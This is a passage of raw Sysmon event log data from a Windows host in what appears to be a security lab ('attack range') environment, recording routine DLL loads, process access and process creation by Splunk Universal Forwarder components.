Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518F,IMPHASH=74D3C2DA8B6F9861866B866AE40683D3trueMicrosoft WindowsValid 734700x800000000000000098571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000098570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02DtrueSplunk, Inc.Valid 10341000x800000000000000098565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.843{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.844{326FD73D-C0B1-6294-2F0B-000000005502}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000098558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:45.203{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B47851AB1967BBE5387D88E4C6CD2E7C,SHA256=0ED3576C06D5A57E92A993CE7F9A98B394139C1ACE6243C2E2D66F495D0A294B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating 